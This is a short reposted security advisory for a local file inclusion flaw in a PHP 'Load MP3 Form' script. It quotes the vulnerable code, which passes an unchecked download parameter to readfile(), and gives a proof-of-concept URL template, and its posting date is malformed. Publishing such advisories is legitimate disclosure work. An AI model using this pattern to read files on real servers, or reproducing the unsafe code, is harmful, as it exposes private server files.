Home / exploits Load MP3 Form - Local File Inclusion
Posted on 30 November -0001
<HTML><HEAD><TITLE>Load MP3 Form - Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[-] Title : Load MP3 Form - Local File Inclusion [-] Author : Shahab Shamsi [-] Vendor : https://github.com/daveismyname/Load-MP3-s-from-a-folder [-] Category : Webapps [-] Date : 06.September.2016 Vulnerable page : /Load-MP3-s-from-a-folder/index.php Vulnerable Source : $file = $dirname.$_GET['download']; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; POC : http://localhost/pach/Load-MP3-s-from-a-folder/index.php?download=[LFI] ************************ * ==> Contact Me : * Telegram : @R4DIK4L * Email : info@securityman.org * WebSilte : WwW.MohitAmn.Org * Tnx : AmirHossein Farjad ************************ </BODY></HTML>